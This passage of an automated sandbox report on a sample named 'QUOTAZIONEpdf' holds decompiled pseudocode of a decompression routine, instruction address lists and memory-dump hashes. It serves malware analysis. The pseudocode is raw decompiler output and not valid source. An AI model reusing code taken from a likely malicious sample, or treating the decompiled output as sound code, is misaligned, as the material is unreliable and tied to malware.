													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                0x00000000
                0x004062eb
                0x004062eb
                0x004062ef
                0x00406310
                0x00406317
                0x0040631d
                0x00406323
                0x00406335
                0x0040633b
                0x00406340
                0x00000000
                0x004062f1
                0x004062f7
                0x004066b8
                0x004066b8
                0x004066b8
                0x004066bb
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00406709
                0x0040670d
                0x004068bc
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x004068ee
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8
                0x00000000
                0x004062ef

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
